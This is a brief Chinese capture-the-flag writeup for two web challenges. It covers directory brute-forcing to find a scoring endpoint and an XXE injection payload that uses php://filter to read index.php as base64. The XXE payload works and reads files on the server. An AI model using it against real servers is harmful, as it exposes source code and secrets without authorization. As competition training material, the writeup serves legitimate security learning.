网路与信息安全领域专项赛-Web Writeup

0x01 Enjoy the Game.

打开网页是一个老虎机

通过子目录爆破找到/js/cqg.js文件,发现包含利用点

score.php,发送数据即可获得flag

0x02 who_are_you?

打开界面发现个输入框

随便输入点东西,然后用开发者工具监控一下流量

一看就是XXE实体注入,构造语句

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE feedback [
<!ENTITY author SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<feedback><author>&author;</author></feedback>

base64解码可得flag

文章目录
  1. 1. 0x01 Enjoy the Game.
  2. 2. 0x02 who_are_you?
,